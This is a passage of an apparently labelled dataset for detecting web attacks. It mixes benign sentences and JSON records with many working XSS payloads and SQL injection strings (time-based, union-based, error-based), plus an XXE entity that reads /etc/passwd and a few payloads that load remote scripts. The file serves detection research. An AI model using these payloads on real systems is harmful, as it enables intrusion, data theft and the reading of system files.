rotate(180deg);}</style><basefont id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></basefont>",1,XSS,545 <script>eval('\141lert(1)')</script>,1,XSS,8762 <rb onpointerleave=alert(1)>XSS</rb>,1,XSS,8801 Carefully select ingredients.,3,normal,24263 1' ) where 1369 = 1369 and 4840 = 1697#,2,SQLi,19618 "1%"" ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( ""%"" = """,2,SQLi,11765 "ABC Home: Up to 60% off select sofas and seating, rugs and tables; up to 30% off lighting and select bedding.",3,normal,26419 1' ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,16885 <del id=x tabindex=1 onbeforeactivate=alert(1)></del>,1,XSS,4921 "1' ) where 8628 = 8628 union all select null,null,null--",2,SQLi,17721 1' ) as kqbh where 6138 = 6138,2,SQLi,20658 Search for DNS Servers and select it from the dropdown.,3,normal,25698 Select pack.,3,normal,24699 Update your hairstyle.,3,normal,22625 "{""id"":null,""name"":""obtain imagine""}",3,normal,26886 "<meta HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:document.vulnerable=true;"">",1,XSS,1979 "1'|| ( select 'lpej' from dual where 8294 = 8294 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) ||'",2,SQLi,10819 ORDER BY 22#,2,SQLi,22316 "Select cuts fell $1.37 to $227.70, based on USDA data.",3,normal,25636 "-1639 ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 3318 = 3318",2,SQLi,10360 "1%' and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15160 1' ) as fksm where 9714 = 9714,2,SQLi,20547 "<sub onbeforecopy=""alert(1)"" contenteditable>test</sub>",1,XSS,4459 "<progress onmouseleave=""alert(1)"">test</progress>",1,XSS,5742 "<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>",1,XSS,2162 "1 ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 9914 = 9914",2,SQLi,12645 <h1><font color=blue>hellox worldss</h1>,1,XSS,7823 "<style>:target {color: red;}</style><base id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></base>",1,XSS,992 "1"" ) where 1793 = 1793",2,SQLi,21401 The nominees that a President Hillary Clinton would select for the judiciary would be almost identical to the kind of nominees a President Bernie Sanders would select.,3,normal,25409 And data protection for a select elite doesn't sound very equitable.,3,normal,26372 "<h1 onkeypress=""alert(1)"" contenteditable>test</h1>",1,XSS,5436 "{""id"":null,""firstName"":""Betty"",""lastName"":""Goh"",""address"":""81A Geylang Road 02-02"",""city"":""688"",""telephone"":""6270363847""}",3,normal,27378 Select a new game to play.,3,normal,24193 "1'|| ( select 'xasp' from dual where 4025 = 4025 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) ||'",2,SQLi,11537 -3243 or 2266 = 3583#,2,SQLi,21666 "1"" and make_set ( 8262 = 3471,3471 ) and ""wayp"" = ""wayp",2,SQLi,17793 "1', ( select ( case when ( 5154 = 5154 ) then 1 else 5154* ( select 5154 from master..sysdatabases ) end ) )",2,SQLi,13724 Where's the grocery store?,3,normal,23508 "1"" where 5372 = 5372 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12998 "1"" ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( ""uqyb"" = ""uqyb",2,SQLi,11620 "javascript:""/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \"" onmouseover=/*&lt;svg/*/onload=alert()//>",1,XSS,512 "select * from generate_series ( 9434,9434,case when ( 9434 = 3991 ) then 1 else 0 end ) limit 1--",2,SQLi,14266 "-2718"" ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""kbvd"" like ""kbvd",2,SQLi,10153 "-9037%"" union all select 6583#",2,SQLi,20568 <dir onpointerenter=alert(1)>XSS</dir>,1,XSS,8351 "-9289 ) ) or make_set ( 5101 = 9919,9919 ) and ( ( 8977 = 8977",2,SQLi,16932 "<dt onmouseup=""alert(1)"">test</dt>",1,XSS,9246 "<slot ondblclick=""alert(1)"">test</slot>",1,XSS,8197 "<div draggable=""true"" contenteditable>drag me</div><caption ondragover=alert(1) contenteditable>drop here</caption>",1,XSS,841 """),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--",2,SQLi,14956 Delete the tweet.,3,normal,22888 pg_sleep(5)--,2,SQLi,22256 Where's the mountain cabin?,3,normal,23560 1 ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ),2,SQLi,13843 "<hgroup onkeydown=""alert(1)"" contenteditable>test</hgroup>",1,XSS,3959 "1"" and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,13381 "<tbody draggable=""true"" ondrag=""alert(1)"">test</tbody>",1,XSS,4841 "<param oncopy=""alert(1)"" contenteditable>test</param>",1,XSS,4891 Where's the concert?,3,normal,23585 "<style>:target {color: red;}</style><noembed id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></noembed>",1,XSS,764 "{""id"":null,""firstName"":""Jolene"",""lastName"":""Lee"",""address"":""400 Monroe St, Hoboken, NJ 07030"",""city"":""866"",""telephone"":""4525191002""}",3,normal,26882 Where's the closest beach?,3,normal,23500 ";1lblah""<iframe/onload=confirm(document.domain);></i>""",1,XSS,4842 1 ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( 2197 = 2197,2,SQLi,14277 "{""id"":null,""name"":""pass several""}",3,normal,27070 ") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (""1337""=""1337",2,SQLi,16825 "1 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )",2,SQLi,13866 "><img src=x onerror=javascript:alert((1""))>",1,XSS,7079 "<div draggable=""true"" contenteditable>drag me</div><xmp ondragover=alert(1) contenteditable>drop here</xmp>",1,XSS,1144 "1%' ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11679 <fieldset onpointerdown=alert(1)>XSS</fieldset>,1,XSS,6191 "1"" and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,12227 "{""id"":null,""name"":""stream light""}",3,normal,27608 %20$(sleep%2050),2,SQLi,22121 "1' ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( 'efwq' like 'efwq",2,SQLi,11944 "-3975' ) or make_set ( 1943 = 3499,3499 ) and ( 'dawb' = 'dawb",2,SQLi,16998 1 ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( ( 3919 = 3919,2,SQLi,15626 "<s draggable=""true"" ondragstart=""alert(1)"">test</s>",1,XSS,5463 "1%' and elt ( 7619 = 1489,1489 ) and '%' = '",2,SQLi,19107 "<bdo onkeydown=""alert(1)"" contenteditable>test</bdo>",1,XSS,5158 "<div style=""font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);"">X",1,XSS,1803 "<blink draggable=""true"" ondrag=""alert(1)"">test</blink>",1,XSS,4758 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i",2,SQLi,11319 Select a quote to inspire.,3,normal,24117 "<base onbeforecut=""alert(1)"" contenteditable>test</base>",1,XSS,4351 1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and 'dogx' = 'dogx,2,SQLi,16493 "select * from users where id = 1 or ""@%"" or 1 = 1 -- 1",2,SQLi,17909 "<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:///etc/passwd"">]><foo>&xee;</foo>",1,XSS,532 Now all that's left to do is select your photog.,3,normal,25866 1 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) -- paxv,2,SQLi,16912 <x on%78xx=1,1,XSS,9830 "<embed code=""http://businessinfo.co.uk/labs/xss/xss.swf"" allowscriptaccess=always>",1,XSS,1921 "1' ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 'rdpv' = 'rdpv",2,SQLi,10969 "1' ) as pkis where 3446 = 3446 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --",2,SQLi,12848 "<xss class=""carousel slide"" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class=""carousel-item active""></xss><xss class=carousel-item></xss></xss></xss>",1,XSS,126 "-3955 where 7276 = 7276 union all select 7276,7276,7276,7276,7276,7276,7276,7276,7276--",2,SQLi,14837 Dumplin' arrives in select theaters and on Netflix December 7.,3,normal,26228 Select mentor.,3,normal,24720 1'+ ( select 'stdl' where 4581 = 4581,2,SQLi,19878 1 ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ),2,SQLi,10056 "select * from users where id = 1 or ""1&"" or 1 = 1 -- 1",2,SQLi,17866 "perl -e &#039;print \"";<;SCR\0IPT>;alert(\"";XSS\"";)<;/SCR\0IPT>;\"";;&#039; >; out",1,XSS,1951 "Hover the cursor over ""Account & Lists"" and select ""Your Account.""",3,normal,26089 "1%"" ) ) ) and elt ( 9524 = 1124,1124 ) and ( ( ( ""%"" = """,2,SQLi,17711 "-2630' ) ) as xavw where 6291 = 6291 union all select 6291,6291,6291,6291,6291,6291,6291,6291,6291#",2,SQLi,14180 "1' ) ) ) union all select null,null,null,null,null#",2,SQLi,18293 Select a workout routine for fitness.,3,normal,24187 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#",2,SQLi,11390 "1 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) -- wynp",2,SQLi,10628 Voters first select their preferred candidate -- that's the state-wide vote.,3,normal,25186 "1 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) )",2,SQLi,11453 "1'+ ( select niht where 7294 = 7294 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12338 "-6145'+ ( select nnjn where 1389 = 1389 union all select 1389,1389,1389--",2,SQLi,15877 -2129' ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'eutm' like 'eutm,2,SQLi,10595 "1%' and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and '%' = '",2,SQLi,16514 1 ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( 5171 = 5171,2,SQLi,15255 grant,3,normal,23171 "{""id"":null,""name"":""wing mail""}",3,normal,27234 You can also select an option which reflects your chosen specialism.,3,normal,25105 <dir id=x tabindex=1 onfocusin=alert(1)></dir>,1,XSS,6343 "1' ) ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( 'qpuy' = 'qpuy",2,SQLi,11092 "1"" ) ) as wssb where 5772 = 5772",2,SQLi,20366 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ""mpxd"" like ""mpxd",2,SQLi,13623 1%' and sleep ( 5 ) #,2,SQLi,21626 "<applet onReadyStateChange applet onReadyStateChange=""javascript:javascript:alert(1)""></applet onReadyStateChange>",1,XSS,849 <article onfocusout=alert(1) tabindex=1 id=x></article><input autofocus>,1,XSS,2379 "-7656"" ) ) ) union all select 3172,3172,3172,3172,3172,3172,3172,3172,3172,3172--",2,SQLi,15165 ",waitfor delay '0:0:__TIME__'--",2,SQLi,20399 "<option onclick=""alert(1)"">test</option>",1,XSS,7897 if ( 6647 = 2179 ) select 6647 else drop function zvlq--,2,SQLi,17681 select two people in the office.,3,normal,25578 "<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""httx://xss.rocks/xss.js""></SCRIPT>",1,XSS,1905 "1"" union all select null--",2,SQLi,20976 ) or ('1'='1'#,2,SQLi,22187 <iframe onreadystatechange=alert(1)></iframe>,1,XSS,6682 "1"" where 6200 = 6200 and elt ( 1210 = 1210,sleep ( 5 ) ) --",2,SQLi,17268 "{""id"":null,""name"":""Lionfish""}",3,normal,27282 <q onblur=alert(1) tabindex=1 id=x></q><input autofocus>,1,XSS,4337 "<style>:target {color: red;}</style><ol id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></ol>",1,XSS,1185 "1' ) ) as ngoo where 8641 = 8641 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12318 "-1681%"" union all select 8180,8180,8180,8180,8180,8180,8180,8180,8180,8180#",2,SQLi,15592 "1 ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 2997 = 2997",2,SQLi,11142 "<fieldset draggable=""true"" ondragend=""alert(1)"">test</fieldset>",1,XSS,3062 "<head onbeforepaste=""alert(1)"" contenteditable>test</head>",1,XSS,3861 Select your pet.,3,normal,24831 "-1964' ) as ihsp where 6379 = 6379 or elt ( 6945 = 6165,6165 ) --",2,SQLi,16688 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ol id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></ol>",1,XSS,290 "<D3""<""/OncLick=""1>[confirm``]""<"">z",1,XSS,9296 <base href=//0>,1,XSS,9808 "<style>:target {transform: rotate(180deg);}</style><shadow id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></shadow>",1,XSS,584 "<time onkeydown=""alert(1)"" contenteditable>test</time>",1,XSS,4689 "<dialog draggable=""true"" ondragenter=""alert(1)"">test</dialog>",1,XSS,3272 "-6680"" ) ) ) union all select 2564,2564,2564,2564,2564,2564#",2,SQLi,17141 "1' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( 'udvq' = 'udvq",2,SQLi,17061 "<div id=""108""><!-- IE 5-8 standards mode -->",1,XSS,7038 "1%"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ""%"" = """,2,SQLi,16531 <animatemotion onpointerenter=alert(1)>XSS</animatemotion>,1,XSS,3881 Where's the vacation home?,3,normal,23561 <small id=x tabindex=1 onbeforedeactivate=alert(1)></small><input autofocus>,1,XSS,2182 "{""id"":null,""name"":""Alakazam""}",3,normal,27567 "1' ) ) union all select null,null,null,null,null,null,null,null--",2,SQLi,16711 "-6254"" where 8941 = 8941 or elt ( 1032 = 1032,3623 ) --",2,SQLi,17814 "1' in boolean mode ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) #",2,SQLi,10351 "<ruby onmouseleave=""alert(1)"">test</ruby>",1,XSS,7626 "{""id"":null,""firstName"":""Yan Feng"",""lastName"":""Yee"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26892 1 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) -- slje,2,SQLi,10637 -4484' ) ) or 6872 = 6872 and ( ( 'oxuo' = 'oxuo,2,SQLi,18778 "-8794 ) ) ) union all select 5802,5802,5802--",2,SQLi,19045 -6912' in boolean mode ) union all select 6012--,2,SQLi,18792 Where's the nutritionist's office?,3,normal,23639 "1%"" ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,17041 "1' ) ) as wkys where 2478 = 2478 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10179 "{""id"":null,""name"":""want generally""}",3,normal,27340 "iif ( 8213 = 4718,1,1/0 )",2,SQLi,21124 "<colgroup ondblclick=""alert(1)"">test</colgroup>",1,XSS,6203 "<style>@keyframes x{}</style><video style=""animation-name:x"" onanimationstart=""alert(1)""></video>",1,XSS,1538 "<article onkeypress=""alert(1)"" contenteditable>test</article>",1,XSS,3283 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i",2,SQLi,11910 <input onpointerdown=alert(1)>XSS</input>,1,XSS,7638 She picked up a package from the post office.,3,normal,23909 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4# ljph",2,SQLi,13959 "On the iPhone 214 order page, select the model you want and select a carrier.",3,normal,25846 Filter spam.,3,normal,23037 "or 0 = 0 #""",2,SQLi,22398 1' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'diyb' like 'diyb,2,SQLi,12535 "<div draggable=""true"" contenteditable>drag me</div><optgroup ondragover=alert(1) contenteditable>drop here</optgroup>",1,XSS,763 "<figure onmousemove=""alert(1)"">test</figure>",1,XSS,7016 "1' ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'lvck' = 'lvck",2,SQLi,10423 "{""id"":null,""name"":""Peckmon""}",3,normal,26956 1 WAITFOR DELAY '0:0:5'-- 1337,2,SQLi,20519 "1"" ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ""pfea"" = ""pfea",2,SQLi,12572 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><legend id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></legend>",1,XSS,187 <bdo onpointerup=alert(1)>XSS</bdo>,1,XSS,9058 Select a fit and a brand that you trust and go with it.,3,normal,25664 "To view the video clips, the site requires the user to first select a video clips, the site requires the user to first select a video player.",3,normal,25252 "<main draggable=""true"" ondragenter=""alert(1)"">test</main>",1,XSS,4064 "-4236 ) union all select 5260,5260,5260,5260,5260,5260,5260,5260,5260#",2,SQLi,16169 "1 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) -- ofqd",2,SQLi,10881 "iif ( 1483 = 7301,1,1/0 )",2,SQLi,21157 She updates her hairstyle.,3,normal,23004 "<style>@keyframes x{}</style><bgsound style=""animation-name:x"" onanimationstart=""alert(1)""></bgsound>",1,XSS,1417 "Home Depot: Up to 40% off patio, 15% off select grills, and up to 30% off select pool supplies",3,normal,26096 "1' ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16299 Select the perfect wedding ceremony location.,3,normal,24385 "-1802%' ) ) union all select 1002,1002,1002,1002,1002,1002,1002#",2,SQLi,16806 "iif ( 1217 = 8831,1,1/0 )",2,SQLi,21150 ( 7098 = 7098 and sleep ( 5 ) ),2,SQLi,20456 1'|| ( select 'boxx' where 2038 = 2038 and 9198 = 9198--,2,SQLi,17652 1' ) as hqaq where 6411 = 6411 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,15233 <audio onpointermove=alert(1)>XSS</audio>,1,XSS,7617 Determine values where needed.,3,normal,23366 <meta id=x tabindex=1 onfocus=alert(1)></meta>,1,XSS,6415 "<noembed oncut=""alert(1)"" contenteditable>test</noembed>",1,XSS,4329 "-4318"" ) as vpvt where 5543 = 5543 union all select 5543,5543,5543,5543,5543,5543--",2,SQLi,15045 <ul onpointerenter=alert(1)>XSS</ul>,1,XSS,8779 "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,17566 "<i onmouseenter=""alert(1)"">test</i>",1,XSS,9052 "1' ) ) as lrnh where 8569 = 8569 union all select null,null,null,null,null--",2,SQLi,15527 "<a/href=""javascript:&#13; javascript:prompt(1)""><input type=""X"">",1,XSS,2870 ]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1,2,SQLi,15389 <style onpointermove=alert(1)>XSS</style>,1,XSS,7673 The Financial Select Sector SPDR Fund (XLF) dropped 1.4 percent.,3,normal,25451 -4961' ) or 3038 = 3038,2,SQLi,21333 "-6442"" ) ) ) or 3038 = 3038",2,SQLi,20898 alert&lpar;1&rpar;,1,XSS,9789 <acronym onpointerover=alert(1)>XSS</acronym>,1,XSS,6633 "1' ) ) as agdn where 8442 = 8442 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,14838 <input onpointerleave=alert(1)>XSS</input>,1,XSS,7383 "<?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time"">",1,XSS,3120 The service has a handful of cable networks in select packages.,3,normal,25383 <video onblur=alert(1) tabindex=1 id=x></video><input autofocus>,1,XSS,2954 "1' ) as dwgv where 1525 = 1525 union all select null,null--",2,SQLi,17259 "))) RLIKE SLEEP(5) AND (((1337"" LIKE ""1337",2,SQLi,19261 "1 ) as vzyk where 5103 = 5103 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,12900 "1%"" ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ""%"" = """,2,SQLi,12988 "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,17007 "1 ) where 4810 = 4810 union all select null,null#",2,SQLi,18583 "<acronym onmouseup=""alert(1)"">test</acronym>",1,XSS,6808 1'|| ( select 'bgdh' from dual where 1967 = 1967,2,SQLi,18803 "<IMG DYNSRC=""javascript:alert('')"">",1,XSS,9116 "select * from users where id = 1 union select +!<@,version ( ) -- 1",2,SQLi,16471 "1' ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13200 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ""%"" = """,2,SQLi,13494 "1' ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( 'hfxu' like 'hfxu",2,SQLi,12659 "<svg onResize svg onResize=""javascript:javascript:alert(1)""></svg onResize>",1,XSS,2207 Where's your SQL help?,3,normal,23416 1 ) as pqle where 4039 = 4039 and 7533 = 7533--,2,SQLi,18858 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26",2,SQLi,12870 "-7107"" ) ) ) order by 1#",2,SQLi,21249 "{""id"":null,""firstName"":""Ong"",""lastName"":""Yn"",""address"":""blk 17 Outram Rd #02-22"",""city"":""971"",""telephone"":""782591746""}",3,normal,27305 1'+ ( select 'vidl' where 9445 = 9445 and 5498 = 5777#,2,SQLi,17990 "<a href=""javascript\x0A:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2458 "{""id"":null,""name"":""Birdramon""}",3,normal,27536 "<map onmouseup=""alert(1)"">test</map>",1,XSS,8826 1 ) ) as uadn where 9588 = 9588 rlike sleep ( 5 ) #,2,SQLi,18332 Sort the cards.,3,normal,22805 "1"" ) ) as nwnp where 6140 = 6140",2,SQLi,20280 "-9837"" where 7201 = 7201 union all select 7201,7201,7201--",2,SQLi,17419 "1%' ) ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13389 "1"" where 3933 = 3933 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12786 1%' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( '%' = ',2,SQLi,10547 "1"" ) where 5794 = 5794 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,14693 <div onmouseover='alert&lpar;1&rpar;'>DIV</div>,1,XSS,6098 "That science must be left free to determine the aims of her investigation, to select and apply her own methods, and to publish the results of her researches without restraint, is a postulate which Ultramontanism either cannot understand or treats with indifference, for it regards as strange and incredible the fundamental law governing all scientific research - that there is for it no higher aim than the discovery of the truth.",3,normal,25495 1 where 8921 = 8921 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --,2,SQLi,15319 "Select one of the bubbles, and then click ""Continue to Cancel.""",3,normal,25620 "{""id"":null,""name"":""Wormmon""}",3,normal,26942 Order a delicious dessert.,3,normal,22757 "1"" ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""vcjt"" like ""vcjt",2,SQLi,11114 or ''-',2,SQLi,22507 Where's the stadium?,3,normal,23542 Where is my book?,3,normal,23483 "1', ( begin if ( 8340 = 8340 ) then dbms_lock.sleep ( 5 )",2,SQLi,17494 "select * from users where id = 1 or "".;"" or 1 = 1 -- 1",2,SQLi,17916 select ( case when ( 7645 = 5921 ) then 7645 else 7645* ( select 